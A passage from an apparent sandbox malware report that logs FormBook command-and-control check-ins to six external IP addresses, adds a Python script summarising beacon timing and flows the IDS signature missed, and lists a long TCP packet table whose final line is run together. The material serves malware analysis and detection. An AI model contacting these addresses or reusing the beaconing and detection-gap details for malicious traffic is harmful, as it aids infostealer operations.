2024-12-09T09:11:08.904181+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49811 | 217.160.0.113 | 80 | TCP
2024-12-09T09:11:28.652905+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49858 | 154.90.58.209 | 80 | TCP
2024-12-09T09:11:31.308929+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49864 | 154.90.58.209 | 80 | TCP
2024-12-09T09:11:33.980808+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49871 | 154.90.58.209 | 80 | TCP
2024-12-09T09:11:44.002220+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49897 | 38.181.21.178 | 80 | TCP
2024-12-09T09:11:46.696987+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49904 | 38.181.21.178 | 80 | TCP
2024-12-09T09:11:49.471268+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49912 | 38.181.21.178 | 80 | TCP
2024-12-09T09:12:08.371814+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49958 | 23.167.152.41 | 80 | TCP
2024-12-09T09:12:11.033303+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49967 | 23.167.152.41 | 80 | TCP
2024-12-09T09:12:13.701206+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49973 | 23.167.152.41 | 80 | TCP
2024-12-09T09:12:24.090048+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49997 | 103.75.185.22 | 80 | TCP
2024-12-09T09:12:26.746209+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50006 | 103.75.185.22 | 80 | TCP
2024-12-09T09:12:29.402336+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50012 | 103.75.185.22 | 80 | TCP
2024-12-09T09:12:38.888222+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50024 | 162.0.213.94 | 80 | TCP
2024-12-09T09:12:41.548244+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50025 | 162.0.213.94 | 80 | TCP
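Read together with the TCP packet table that follows, the alert table shows FormBook's check-in rhythm in this run: three POST check-ins to one C2 host roughly 2.7 s apart, then a move to the next host, and one additional port-80 flow per host (source ports 49818, 49879, 49920, and the very first flow to 172.67.220.36) that raised no alert because the ETPRO signature matches only the POST check-in. The Python below is an added example, not Joe Sandbox tooling, that parses both tables, summarises check-ins per host in rotation order and lists the flows that never produced an alert. The alert rows and the first client packet of each flow are copied from the report; the pipe-separated layout, field names and the function names are my own.

```python
from collections import OrderedDict
from datetime import datetime

# Constructed sample: the Suricata alert rows from the table above, pipe-separated
# in the table's column order (timestamp, SID, signature, severity, src IP,
# src port, dst IP, dst port, protocol).
ALERTS = """\
2024-12-09T09:11:03.518511+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|49797|217.160.0.113|80|TCP
2024-12-09T09:11:06.236207+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|49804|217.160.0.113|80|TCP
2024-12-09T09:11:08.904181+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|49811|217.160.0.113|80|TCP
2024-12-09T09:11:28.652905+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|49858|154.90.58.209|80|TCP
2024-12-09T09:11:31.308929+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|49864|154.90.58.209|80|TCP
2024-12-09T09:11:33.980808+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|49871|154.90.58.209|80|TCP
2024-12-09T09:11:44.002220+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|49897|38.181.21.178|80|TCP
2024-12-09T09:11:46.696987+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|49904|38.181.21.178|80|TCP
2024-12-09T09:11:49.471268+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|49912|38.181.21.178|80|TCP
2024-12-09T09:12:08.371814+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|49958|23.167.152.41|80|TCP
2024-12-09T09:12:11.033303+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|49967|23.167.152.41|80|TCP
2024-12-09T09:12:13.701206+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|49973|23.167.152.41|80|TCP
2024-12-09T09:12:24.090048+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|49997|103.75.185.22|80|TCP
2024-12-09T09:12:26.746209+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|50006|103.75.185.22|80|TCP
2024-12-09T09:12:29.402336+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|50012|103.75.185.22|80|TCP
2024-12-09T09:12:38.888222+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|50024|162.0.213.94|80|TCP
2024-12-09T09:12:41.548244+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|50025|162.0.213.94|80|TCP
"""

# Constructed sample: the first client packet of every flow in the report's
# TCP table (timestamp, src port, dst port, src IP, dst IP).
FLOWS = """\
Dec 9, 2024 09:10:44.878432989 CET|49758|80|192.168.2.4|172.67.220.36
Dec 9, 2024 09:11:02.115461111 CET|49797|80|192.168.2.4|217.160.0.113
Dec 9, 2024 09:11:04.828087091 CET|49804|80|192.168.2.4|217.160.0.113
Dec 9, 2024 09:11:07.489845991 CET|49811|80|192.168.2.4|217.160.0.113
Dec 9, 2024 09:11:10.156071901 CET|49818|80|192.168.2.4|217.160.0.113
Dec 9, 2024 09:11:27.003443003 CET|49858|80|192.168.2.4|154.90.58.209
Dec 9, 2024 09:11:29.671521902 CET|49864|80|192.168.2.4|154.90.58.209
Dec 9, 2024 09:11:32.327610016 CET|49871|80|192.168.2.4|154.90.58.209
Dec 9, 2024 09:11:34.999473095 CET|49879|80|192.168.2.4|154.90.58.209
Dec 9, 2024 09:11:42.329700947 CET|49897|80|192.168.2.4|38.181.21.178
Dec 9, 2024 09:11:45.046372890 CET|49904|80|192.168.2.4|38.181.21.178
Dec 9, 2024 09:11:47.811846972 CET|49912|80|192.168.2.4|38.181.21.178
Dec 9, 2024 09:11:50.514933109 CET|49920|80|192.168.2.4|38.181.21.178
Dec 9, 2024 09:12:07.355369091 CET|49958|80|192.168.2.4|23.167.152.41
Dec 9, 2024 09:12:10.020797968 CET|49967|80|192.168.2.4|23.167.152.41
Dec 9, 2024 09:12:12.688174009 CET|49973|80|192.168.2.4|23.167.152.41
"""


def alert_time(ts):
    # %z accepts "+0100"; drop tzinfo so it compares with the naive CET flow times
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z").replace(tzinfo=None)


def flow_time(ts):
    # Joe Sandbox prints nanoseconds plus a zone name; %f takes at most 6 digits
    stamp = ts.rsplit(" ", 1)[0]
    head, _, frac = stamp.partition(".")
    return datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def parse_alerts(text):
    rows = []
    for line in text.splitlines():
        ts, sid, sig, _sev, _src, sport, dst, dport, _proto = line.split("|")
        rows.append({"time": alert_time(ts), "sid": int(sid), "sig": sig,
                     "src_port": int(sport), "dst_ip": dst, "dst_port": int(dport)})
    return rows


def parse_flows(text):
    return [{"time": flow_time(ts), "src_port": int(sport), "dst_ip": dst}
            for ts, sport, _dport, _src, dst in
            (line.split("|") for line in text.splitlines())]


def c2_summary(alerts):
    """Check-ins per C2 host in first-seen order, with the mean gap between
    consecutive check-ins to the same host (the beacon cadence)."""
    by_host = OrderedDict()
    for a in sorted(alerts, key=lambda a: a["time"]):
        by_host.setdefault(a["dst_ip"], []).append(a)
    out = OrderedDict()
    for host, hits in by_host.items():
        gaps = [(b["time"] - a["time"]).total_seconds() for a, b in zip(hits, hits[1:])]
        out[host] = {"checkins": len(hits), "first": hits[0]["time"],
                     "last": hits[-1]["time"],
                     "mean_gap_s": round(sum(gaps) / len(gaps), 3) if gaps else None}
    return out


def silent_flows(flows, alerts):
    """Port-80 flows that never raised a check-in alert: the signature only
    matches the POST check-in, so these are the ones to open in the pcap."""
    alerted = {(a["src_port"], a["dst_ip"]) for a in alerts}
    return [(f["src_port"], f["dst_ip"]) for f in flows
            if (f["src_port"], f["dst_ip"]) not in alerted]
```

Run `c2_summary(parse_alerts(ALERTS))` to get the six hosts in the order the sample rotated through them, each with its check-in count and mean gap; `silent_flows(parse_flows(FLOWS), parse_alerts(ALERTS))` returns the four flows with no alert. Matching on (source port, destination IP) rather than on time is deliberate: the alert timestamp is the POST, not the SYN, so a time window would be fragile.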
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 9, 2024 09:10:44.878432989 CET | 49758 | 80 | 192.168.2.4 | 172.67.220.36
Dec 9, 2024 09:10:44.997772932 CET | 80 | 49758 | 172.67.220.36 | 192.168.2.4
Dec 9, 2024 09:10:44.997889996 CET | 49758 | 80 | 192.168.2.4 | 172.67.220.36
Dec 9, 2024 09:10:45.008107901 CET | 49758 | 80 | 192.168.2.4 | 172.67.220.36
Dec 9, 2024 09:10:45.127428055 CET | 80 | 49758 | 172.67.220.36 | 192.168.2.4
Dec 9, 2024 09:10:46.318923950 CET | 80 | 49758 | 172.67.220.36 | 192.168.2.4
Dec 9, 2024 09:10:46.319015026 CET | 80 | 49758 | 172.67.220.36 | 192.168.2.4
Dec 9, 2024 09:10:46.319025993 CET | 80 | 49758 | 172.67.220.36 | 192.168.2.4
Dec 9, 2024 09:10:46.319153070 CET | 49758 | 80 | 192.168.2.4 | 172.67.220.36
Dec 9, 2024 09:10:46.319238901 CET | 80 | 49758 | 172.67.220.36 | 192.168.2.4
Dec 9, 2024 09:10:46.319279909 CET | 80 | 49758 | 172.67.220.36 | 192.168.2.4
Dec 9, 2024 09:10:46.319279909 CET | 49758 | 80 | 192.168.2.4 | 172.67.220.36
Dec 9, 2024 09:10:46.319299936 CET | 80 | 49758 | 172.67.220.36 | 192.168.2.4
Dec 9, 2024 09:10:46.319319963 CET | 80 | 49758 | 172.67.220.36 | 192.168.2.4
Dec 9, 2024 09:10:46.319333076 CET | 49758 | 80 | 192.168.2.4 | 172.67.220.36
Dec 9, 2024 09:10:46.320075035 CET | 80 | 49758 | 172.67.220.36 | 192.168.2.4
Dec 9, 2024 09:10:46.320100069 CET | 80 | 49758 | 172.67.220.36 | 192.168.2.4
Dec 9, 2024 09:10:46.320111036 CET | 80 | 49758 | 172.67.220.36 | 192.168.2.4
Dec 9, 2024 09:10:46.320122957 CET | 49758 | 80 | 192.168.2.4 | 172.67.220.36
Dec 9, 2024 09:10:46.320141077 CET | 49758 | 80 | 192.168.2.4 | 172.67.220.36
Dec 9, 2024 09:10:46.327419043 CET | 80 | 49758 | 172.67.220.36 | 192.168.2.4
Dec 9, 2024 09:10:46.327552080 CET | 49758 | 80 | 192.168.2.4 | 172.67.220.36
Dec 9, 2024 09:10:46.330759048 CET | 49758 | 80 | 192.168.2.4 | 172.67.220.36
Dec 9, 2024 09:10:46.450006962 CET | 80 | 49758 | 172.67.220.36 | 192.168.2.4
Dec 9, 2024 09:11:02.115461111 CET | 49797 | 80 | 192.168.2.4 | 217.160.0.113
Dec 9, 2024 09:11:02.234879971 CET | 80 | 49797 | 217.160.0.113 | 192.168.2.4
Dec 9, 2024 09:11:02.235321045 CET | 49797 | 80 | 192.168.2.4 | 217.160.0.113
Dec 9, 2024 09:11:02.298285961 CET | 49797 | 80 | 192.168.2.4 | 217.160.0.113
Dec 9, 2024 09:11:02.417562962 CET | 80 | 49797 | 217.160.0.113 | 192.168.2.4
Dec 9, 2024 09:11:03.518059969 CET | 80 | 49797 | 217.160.0.113 | 192.168.2.4
Dec 9, 2024 09:11:03.518261909 CET | 80 | 49797 | 217.160.0.113 | 192.168.2.4
Dec 9, 2024 09:11:03.518511057 CET | 49797 | 80 | 192.168.2.4 | 217.160.0.113
Dec 9, 2024 09:11:03.809747934 CET | 49797 | 80 | 192.168.2.4 | 217.160.0.113
Dec 9, 2024 09:11:04.828087091 CET | 49804 | 80 | 192.168.2.4 | 217.160.0.113
Dec 9, 2024 09:11:04.947510958 CET | 80 | 49804 | 217.160.0.113 | 192.168.2.4
Dec 9, 2024 09:11:04.947658062 CET | 49804 | 80 | 192.168.2.4 | 217.160.0.113
Dec 9, 2024 09:11:04.963036060 CET | 49804 | 80 | 192.168.2.4 | 217.160.0.113
Dec 9, 2024 09:11:05.082349062 CET | 80 | 49804 | 217.160.0.113 | 192.168.2.4
Dec 9, 2024 09:11:06.236061096 CET | 80 | 49804 | 217.160.0.113 | 192.168.2.4
Dec 9, 2024 09:11:06.236146927 CET | 80 | 49804 | 217.160.0.113 | 192.168.2.4
Dec 9, 2024 09:11:06.236207008 CET | 49804 | 80 | 192.168.2.4 | 217.160.0.113
Dec 9, 2024 09:11:06.465384007 CET | 49804 | 80 | 192.168.2.4 | 217.160.0.113
Dec 9, 2024 09:11:07.489845991 CET | 49811 | 80 | 192.168.2.4 | 217.160.0.113
Dec 9, 2024 09:11:07.609704018 CET | 80 | 49811 | 217.160.0.113 | 192.168.2.4
Dec 9, 2024 09:11:07.609816074 CET | 49811 | 80 | 192.168.2.4 | 217.160.0.113
Dec 9, 2024 09:11:07.625307083 CET | 49811 | 80 | 192.168.2.4 | 217.160.0.113
Dec 9, 2024 09:11:07.745060921 CET | 80 | 49811 | 217.160.0.113 | 192.168.2.4
Dec 9, 2024 09:11:07.745075941 CET | 80 | 49811 | 217.160.0.113 | 192.168.2.4
Dec 9, 2024 09:11:07.745084047 CET | 80 | 49811 | 217.160.0.113 | 192.168.2.4
Dec 9, 2024 09:11:07.745095015 CET | 80 | 49811 | 217.160.0.113 | 192.168.2.4
Dec 9, 2024 09:11:07.745193958 CET | 80 | 49811 | 217.160.0.113 | 192.168.2.4
Dec 9, 2024 09:11:07.745225906 CET | 80 | 49811 | 217.160.0.113 | 192.168.2.4
Dec 9, 2024 09:11:07.745459080 CET | 80 | 49811 | 217.160.0.113 | 192.168.2.4
Dec 9, 2024 09:11:07.745469093 CET | 80 | 49811 | 217.160.0.113 | 192.168.2.4
Dec 9, 2024 09:11:07.745479107 CET | 80 | 49811 | 217.160.0.113 | 192.168.2.4
Dec 9, 2024 09:11:08.903601885 CET | 80 | 49811 | 217.160.0.113 | 192.168.2.4
Dec 9, 2024 09:11:08.904112101 CET | 80 | 49811 | 217.160.0.113 | 192.168.2.4
Dec 9, 2024 09:11:08.904181004 CET | 49811 | 80 | 192.168.2.4 | 217.160.0.113
Dec 9, 2024 09:11:09.137335062 CET | 49811 | 80 | 192.168.2.4 | 217.160.0.113
Dec 9, 2024 09:11:10.156071901 CET | 49818 | 80 | 192.168.2.4 | 217.160.0.113
Dec 9, 2024 09:11:10.275603056 CET | 80 | 49818 | 217.160.0.113 | 192.168.2.4
Dec 9, 2024 09:11:10.275837898 CET | 49818 | 80 | 192.168.2.4 | 217.160.0.113
Dec 9, 2024 09:11:10.285001040 CET | 49818 | 80 | 192.168.2.4 | 217.160.0.113
Dec 9, 2024 09:11:10.404273987 CET | 80 | 49818 | 217.160.0.113 | 192.168.2.4
Dec 9, 2024 09:11:11.632448912 CET | 80 | 49818 | 217.160.0.113 | 192.168.2.4
Dec 9, 2024 09:11:11.632467985 CET | 80 | 49818 | 217.160.0.113 | 192.168.2.4
Dec 9, 2024 09:11:11.632601023 CET | 80 | 49818 | 217.160.0.113 | 192.168.2.4
Dec 9, 2024 09:11:11.632673025 CET | 49818 | 80 | 192.168.2.4 | 217.160.0.113
Dec 9, 2024 09:11:11.632720947 CET | 49818 | 80 | 192.168.2.4 | 217.160.0.113
Dec 9, 2024 09:11:11.635482073 CET | 49818 | 80 | 192.168.2.4 | 217.160.0.113
Dec 9, 2024 09:11:11.754659891 CET | 80 | 49818 | 217.160.0.113 | 192.168.2.4
Dec 9, 2024 09:11:27.003443003 CET | 49858 | 80 | 192.168.2.4 | 154.90.58.209
Dec 9, 2024 09:11:27.122733116 CET | 80 | 49858 | 154.90.58.209 | 192.168.2.4
Dec 9, 2024 09:11:27.122884035 CET | 49858 | 80 | 192.168.2.4 | 154.90.58.209
Dec 9, 2024 09:11:27.138220072 CET | 49858 | 80 | 192.168.2.4 | 154.90.58.209
Dec 9, 2024 09:11:27.257642031 CET | 80 | 49858 | 154.90.58.209 | 192.168.2.4
Dec 9, 2024 09:11:28.652904987 CET | 49858 | 80 | 192.168.2.4 | 154.90.58.209
Dec 9, 2024 09:11:28.708869934 CET | 80 | 49858 | 154.90.58.209 | 192.168.2.4
Dec 9, 2024 09:11:28.708903074 CET | 80 | 49858 | 154.90.58.209 | 192.168.2.4
Dec 9, 2024 09:11:28.708935022 CET | 49858 | 80 | 192.168.2.4 | 154.90.58.209
Dec 9, 2024 09:11:28.708965063 CET | 49858 | 80 | 192.168.2.4 | 154.90.58.209
Dec 9, 2024 09:11:28.772526026 CET | 80 | 49858 | 154.90.58.209 | 192.168.2.4
Dec 9, 2024 09:11:28.772589922 CET | 49858 | 80 | 192.168.2.4 | 154.90.58.209
Dec 9, 2024 09:11:29.671521902 CET | 49864 | 80 | 192.168.2.4 | 154.90.58.209
Dec 9, 2024 09:11:29.790800095 CET | 80 | 49864 | 154.90.58.209 | 192.168.2.4
Dec 9, 2024 09:11:29.790904045 CET | 49864 | 80 | 192.168.2.4 | 154.90.58.209
Dec 9, 2024 09:11:29.806229115 CET | 49864 | 80 | 192.168.2.4 | 154.90.58.209
Dec 9, 2024 09:11:29.925622940 CET | 80 | 49864 | 154.90.58.209 | 192.168.2.4
Dec 9, 2024 09:11:31.308928967 CET | 49864 | 80 | 192.168.2.4 | 154.90.58.209
Dec 9, 2024 09:11:31.386343956 CET | 80 | 49864 | 154.90.58.209 | 192.168.2.4
Dec 9, 2024 09:11:31.386369944 CET | 80 | 49864 | 154.90.58.209 | 192.168.2.4
Dec 9, 2024 09:11:31.386478901 CET | 49864 | 80 | 192.168.2.4 | 154.90.58.209
Dec 9, 2024 09:11:31.386519909 CET | 49864 | 80 | 192.168.2.4 | 154.90.58.209
Dec 9, 2024 09:11:31.428203106 CET | 80 | 49864 | 154.90.58.209 | 192.168.2.4
Dec 9, 2024 09:11:31.428287029 CET | 49864 | 80 | 192.168.2.4 | 154.90.58.209
Dec 9, 2024 09:11:32.327610016 CET | 49871 | 80 | 192.168.2.4 | 154.90.58.209
Dec 9, 2024 09:11:32.447103024 CET | 80 | 49871 | 154.90.58.209 | 192.168.2.4
Dec 9, 2024 09:11:32.449733019 CET | 49871 | 80 | 192.168.2.4 | 154.90.58.209
Dec 9, 2024 09:11:32.464766026 CET | 49871 | 80 | 192.168.2.4 | 154.90.58.209
Dec 9, 2024 09:11:32.584207058 CET | 80 | 49871 | 154.90.58.209 | 192.168.2.4
Dec 9, 2024 09:11:32.584220886 CET | 80 | 49871 | 154.90.58.209 | 192.168.2.4
Dec 9, 2024 09:11:32.584302902 CET | 80 | 49871 | 154.90.58.209 | 192.168.2.4
Dec 9, 2024 09:11:32.584314108 CET | 80 | 49871 | 154.90.58.209 | 192.168.2.4
Dec 9, 2024 09:11:32.584362030 CET | 80 | 49871 | 154.90.58.209 | 192.168.2.4
Dec 9, 2024 09:11:32.584371090 CET | 80 | 49871 | 154.90.58.209 | 192.168.2.4
Dec 9, 2024 09:11:32.584460020 CET | 80 | 49871 | 154.90.58.209 | 192.168.2.4
Dec 9, 2024 09:11:32.584469080 CET | 80 | 49871 | 154.90.58.209 | 192.168.2.4
Dec 9, 2024 09:11:32.584564924 CET | 80 | 49871 | 154.90.58.209 | 192.168.2.4
Dec 9, 2024 09:11:33.980808020 CET | 49871 | 80 | 192.168.2.4 | 154.90.58.209
Dec 9, 2024 09:11:34.101522923 CET | 80 | 49871 | 154.90.58.209 | 192.168.2.4
Dec 9, 2024 09:11:34.101573944 CET | 49871 | 80 | 192.168.2.4 | 154.90.58.209
Dec 9, 2024 09:11:34.999473095 CET | 49879 | 80 | 192.168.2.4 | 154.90.58.209
Dec 9, 2024 09:11:35.118876934 CET | 80 | 49879 | 154.90.58.209 | 192.168.2.4
Dec 9, 2024 09:11:35.121162891 CET | 49879 | 80 | 192.168.2.4 | 154.90.58.209
Dec 9, 2024 09:11:35.131052971 CET | 49879 | 80 | 192.168.2.4 | 154.90.58.209
Dec 9, 2024 09:11:35.250581980 CET | 80 | 49879 | 154.90.58.209 | 192.168.2.4
Dec 9, 2024 09:11:36.716455936 CET | 80 | 49879 | 154.90.58.209 | 192.168.2.4
Dec 9, 2024 09:11:36.716645002 CET | 80 | 49879 | 154.90.58.209 | 192.168.2.4
Dec 9, 2024 09:11:36.716697931 CET | 49879 | 80 | 192.168.2.4 | 154.90.58.209
Dec 9, 2024 09:11:36.754941940 CET | 49879 | 80 | 192.168.2.4 | 154.90.58.209
Dec 9, 2024 09:11:36.874373913 CET | 80 | 49879 | 154.90.58.209 | 192.168.2.4
Dec 9, 2024 09:11:42.329700947 CET | 49897 | 80 | 192.168.2.4 | 38.181.21.178
Dec 9, 2024 09:11:42.449143887 CET | 80 | 49897 | 38.181.21.178 | 192.168.2.4
Dec 9, 2024 09:11:42.449261904 CET | 49897 | 80 | 192.168.2.4 | 38.181.21.178
Dec 9, 2024 09:11:42.512797117 CET | 49897 | 80 | 192.168.2.4 | 38.181.21.178
Dec 9, 2024 09:11:42.632076979 CET | 80 | 49897 | 38.181.21.178 | 192.168.2.4
Dec 9, 2024 09:11:44.001899004 CET | 80 | 49897 | 38.181.21.178 | 192.168.2.4
Dec 9, 2024 09:11:44.002119064 CET | 80 | 49897 | 38.181.21.178 | 192.168.2.4
Dec 9, 2024 09:11:44.002219915 CET | 49897 | 80 | 192.168.2.4 | 38.181.21.178
Dec 9, 2024 09:11:44.027776003 CET | 49897 | 80 | 192.168.2.4 | 38.181.21.178
Dec 9, 2024 09:11:45.046372890 CET | 49904 | 80 | 192.168.2.4 | 38.181.21.178
Dec 9, 2024 09:11:45.165688992 CET | 80 | 49904 | 38.181.21.178 | 192.168.2.4
Dec 9, 2024 09:11:45.165772915 CET | 49904 | 80 | 192.168.2.4 | 38.181.21.178
Dec 9, 2024 09:11:45.280826092 CET | 49904 | 80 | 192.168.2.4 | 38.181.21.178
Dec 9, 2024 09:11:45.400119066 CET | 80 | 49904 | 38.181.21.178 | 192.168.2.4
Dec 9, 2024 09:11:46.696757078 CET | 80 | 49904 | 38.181.21.178 | 192.168.2.4
Dec 9, 2024 09:11:46.696914911 CET | 80 | 49904 | 38.181.21.178 | 192.168.2.4
Dec 9, 2024 09:11:46.696986914 CET | 49904 | 80 | 192.168.2.4 | 38.181.21.178
Dec 9, 2024 09:11:46.793457985 CET | 49904 | 80 | 192.168.2.4 | 38.181.21.178
Dec 9, 2024 09:11:47.811846972 CET | 49912 | 80 | 192.168.2.4 | 38.181.21.178
Dec 9, 2024 09:11:47.931195974 CET | 80 | 49912 | 38.181.21.178 | 192.168.2.4
Dec 9, 2024 09:11:47.931277037 CET | 49912 | 80 | 192.168.2.4 | 38.181.21.178
Dec 9, 2024 09:11:47.983464956 CET | 49912 | 80 | 192.168.2.4 | 38.181.21.178
Dec 9, 2024 09:11:48.103205919 CET | 80 | 49912 | 38.181.21.178 | 192.168.2.4
Dec 9, 2024 09:11:48.103223085 CET | 80 | 49912 | 38.181.21.178 | 192.168.2.4
Dec 9, 2024 09:11:48.103240967 CET | 80 | 49912 | 38.181.21.178 | 192.168.2.4
Dec 9, 2024 09:11:48.103250980 CET | 80 | 49912 | 38.181.21.178 | 192.168.2.4
Dec 9, 2024 09:11:48.103303909 CET | 80 | 49912 | 38.181.21.178 | 192.168.2.4
Dec 9, 2024 09:11:48.103321075 CET | 80 | 49912 | 38.181.21.178 | 192.168.2.4
Dec 9, 2024 09:11:48.103406906 CET | 80 | 49912 | 38.181.21.178 | 192.168.2.4
Dec 9, 2024 09:11:48.103418112 CET | 80 | 49912 | 38.181.21.178 | 192.168.2.4
Dec 9, 2024 09:11:48.103507042 CET | 80 | 49912 | 38.181.21.178 | 192.168.2.4
Dec 9, 2024 09:11:49.471088886 CET | 80 | 49912 | 38.181.21.178 | 192.168.2.4
Dec 9, 2024 09:11:49.471118927 CET | 80 | 49912 | 38.181.21.178 | 192.168.2.4
Dec 9, 2024 09:11:49.471267939 CET | 49912 | 80 | 192.168.2.4 | 38.181.21.178
Dec 9, 2024 09:11:49.496500969 CET | 49912 | 80 | 192.168.2.4 | 38.181.21.178
Dec 9, 2024 09:11:50.514933109 CET | 49920 | 80 | 192.168.2.4 | 38.181.21.178
Dec 9, 2024 09:11:50.634174109 CET | 80 | 49920 | 38.181.21.178 | 192.168.2.4
Dec 9, 2024 09:11:50.634330988 CET | 49920 | 80 | 192.168.2.4 | 38.181.21.178
Dec 9, 2024 09:11:50.644700050 CET | 49920 | 80 | 192.168.2.4 | 38.181.21.178
Dec 9, 2024 09:11:50.764044046 CET | 80 | 49920 | 38.181.21.178 | 192.168.2.4
Dec 9, 2024 09:11:52.245742083 CET | 80 | 49920 | 38.181.21.178 | 192.168.2.4
Dec 9, 2024 09:11:52.245758057 CET | 80 | 49920 | 38.181.21.178 | 192.168.2.4
Dec 9, 2024 09:11:52.246161938 CET | 49920 | 80 | 192.168.2.4 | 38.181.21.178
Dec 9, 2024 09:11:52.249083996 CET | 49920 | 80 | 192.168.2.4 | 38.181.21.178
Dec 9, 2024 09:11:52.368262053 CET | 80 | 49920 | 38.181.21.178 | 192.168.2.4
Dec 9, 2024 09:12:07.355369091 CET | 49958 | 80 | 192.168.2.4 | 23.167.152.41
Dec 9, 2024 09:12:07.475042105 CET | 80 | 49958 | 23.167.152.41 | 192.168.2.4
Dec 9, 2024 09:12:07.478838921 CET | 49958 | 80 | 192.168.2.4 | 23.167.152.41
Dec 9, 2024 09:12:07.494719982 CET | 49958 | 80 | 192.168.2.4 | 23.167.152.41
Dec 9, 2024 09:12:07.614042997 CET | 80 | 49958 | 23.167.152.41 | 192.168.2.4
Dec 9, 2024 09:12:08.371731043 CET | 80 | 49958 | 23.167.152.41 | 192.168.2.4
Dec 9, 2024 09:12:08.371814013 CET | 49958 | 80 | 192.168.2.4 | 23.167.152.41
Dec 9, 2024 09:12:08.996192932 CET | 49958 | 80 | 192.168.2.4 | 23.167.152.41
Dec 9, 2024 09:12:09.116555929 CET | 80 | 49958 | 23.167.152.41 | 192.168.2.4
Dec 9, 2024 09:12:10.020797968 CET | 49967 | 80 | 192.168.2.4 | 23.167.152.41
Dec 9, 2024 09:12:10.140232086 CET | 80 | 49967 | 23.167.152.41 | 192.168.2.4
Dec 9, 2024 09:12:10.140324116 CET | 49967 | 80 | 192.168.2.4 | 23.167.152.41
Dec 9, 2024 09:12:10.155463934 CET | 49967 | 80 | 192.168.2.4 | 23.167.152.41
Dec 9, 2024 09:12:10.274835110 CET | 80 | 49967 | 23.167.152.41 | 192.168.2.4
Dec 9, 2024 09:12:11.033076048 CET | 80 | 49967 | 23.167.152.41 | 192.168.2.4
Dec 9, 2024 09:12:11.033303022 CET | 49967 | 80 | 192.168.2.4 | 23.167.152.41
Dec 9, 2024 09:12:11.668123960 CET | 49967 | 80 | 192.168.2.4 | 23.167.152.41
Dec 9, 2024 09:12:11.787334919 CET | 80 | 49967 | 23.167.152.41 | 192.168.2.4
Dec 9, 2024 09:12:12.688174009 CET | 49973 | 80 | 192.168.2.4 | 23.167.152.41
Dec 9, 2024 09:12:12.807436943 CET | 80 | 49973 | 23.167.152.41 | 192.168.2.4
Dec 9, 2024 09:12:12.807580948 CET | 49973 | 80 | 192.168.2.4 | 23.167.152.41
Dec 9, 2024 09:12:12.826097965 CET | 49973 | 80 | 192.168.2.4 | 23.167.152.41
Dec 9, 2024 09:12:12.947016001 CET | 80 | 49973 | 23.167.152.41 | 192.168.2.4
Dec 9, 2024 09:12:12.947304010 CET | 80 | 49973 | 23.167.152.41 | 192.168.2.4
Dec 9, 2024 09:12:12.947443962 CET | 80 | 49973 | 23.167.152.41 | 192.168.2.4
Dec 9, 2024 09:12:12.947453022 CET | 80 | 49973 | 23.167.152.41 | 192.168.2.4
Dec 9, 2024 09:12:12.947463036 CET | 80 | 49973 | 23.167.152.41 | 192.168.2.4
Dec 9, 2024 09:12:12.948688984 CET | 80 | 49973 | 23.167.152.41 | 192.168.2.4
Dec 9, 2024 09:12:12.948698997 CET | 80 | 49973 | 23.167.152.41 | 192.168.2.4
Dec 9, 2024 09:12:12.948935032 CET | 80 | 49973 | 23.167.152.41 | 192.168.2.4
Dec 9, 2024 09:12:12.948944092 CET | 80 | 49973 | 23.167.152.41 | 192.168.2.4
                                                              Dec 9, 2024 09:12:13.701159954 CET804997323.167.152.41192.168.2.4
